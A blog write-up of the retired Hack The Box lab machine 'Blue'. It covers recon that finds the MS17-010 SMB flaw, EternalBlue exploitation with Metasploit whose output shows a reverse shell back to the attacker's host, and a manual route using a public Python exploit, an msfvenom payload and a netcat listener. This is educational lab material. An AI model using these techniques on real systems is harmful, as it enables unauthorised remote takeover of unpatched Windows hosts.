My write-up on HTB’s retired machine “Blue”

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

There are probably many walk-through and write-ups about HTB’s Blue, however, this is my approach using Metasploit and manual exploitation techniques.

Reconnaissance

First, I will use nmapAutomator to automate the process of recon/enumeration

Basic scan results:PORT      STATE SERVICE      VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 56s, deviation: 1s, median: 56s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-02-12T02:16:33+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-12T02:16:36
|_ start_date: 2020-02-12T02:11:31

Vulnerability summary scan on all ports:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49152/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49156/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Enumeration

Ports and services that needed to be enumerated further:

  • 135/tcp open msrpc Microsoft Windows RPC
  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

Based on our nmap scan results, host is vulnerable to CVE-2017–0143 ms17–010.

Let’s now search possible exploits for ms17–010 using SearchSploit

Exploitation

First attempt using Metasploit module windows/smb/ms17_010_eternalblue

Module options (exploit/windows/smb/ms17_010_eternalblue):Name           Current Setting  Required  Description
---- --------------- -------- -----------
RHOST 10.10.10.40 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 10.10.14.42:4444
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.42:4444 -> 10.10.10.40:49160) at 2020-02-12 07:14:40 -0500
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
whoami
nt authority\system
C:\Windows\system32>

The results above illustrates that we have local admin privilege access.

Manual Exploitation

Try to exploit the host without using Metasploit.

Further research to manually exploit MS17–010 led me to https://github.com/helviojunior/MS17-010.git, exploits written in python. There are several files in this repository with explanation as to how the exploit works.

First let’s begin using checker.py script to find accessible named pipe on host 10.10.10.40

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

After running checker.py, the target host shows that it is not patched which is what we are looking for but we need to find accessible named pipes. To do accomplish this, we have to modify the script to give us access to named pipes. First let’s check by using ‘guest’ as username with null password to see if we it works.

After slight modification, checkper.py gave us accessible named pipes below.

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

Our next step is to utilize the send_and_execute.py exploit script and create our payload. ‘send_and_execute.py’ exploit use the same bug as eternalromance and eternalsynergy, however, access to named pipe is still needed.

Based on the results we have obtained running checker.py, slight modification is needed in send_and_execute.py.

Once modified, proceed on creating payload using msfvenom

Descriptions of syntax and switches used to create ms17–010.exe

The -a flag specifies the architecture as 64-bit.

The — platform option sets the platform as Windows.

The -p flag specifies the payload.

LHOST is our local machine to connect back to.

LPORT is the local port to connect to.

The -e flag specifies the encoder to use.

The -f flag sets the format.

The -o flag specifies the output file.

The EXITFUNC=thread runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit)

Finally, on another terminal window, setup a netcat listener on port 443 and send the payload to the host using send_and_execute.py

Directory of c:\Users\haris\Desktop24/12/2017  02:23    <DIR>          .
24/12/2017 02:23 <DIR> ..
21/07/2017 06:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 15,460,773,888 bytes free
c:\Users\haris>dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator\Desktop24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
21/07/2017 06:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,460,773,888 bytes free
c:\Users\haris>

VirusTotal

VT’s detection rate of the ms-17–010.exe payload that we have created and used to exploit the host.

https://www.virustotal.com/gui/file/f24cc582b0697f19fe5f24262aa7a28292a20a5995069bef91d695892abef1b8/detection

Lessons Learned

  • During the enumeration phase, understand not only the ports and services but also understand the system architecture.
  • Using Metasploit is more convenient and a very powerful tool but for those of us preparing for OSCP, we have to learn without using it.
  • As always, keep your systems up-to-date on patches.

References:

  1. https://www.hacking-tutorial.com/tips-and-trick/what-is-metasploit-exitfunc/
  2. https://www.offensive-security.com/metasploit-unleashed/msfvenom/
  3. https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
  4. https://github.com/21y4d/nmapAutomator

InfoSec, Dad, Jack of All Trades and Master of None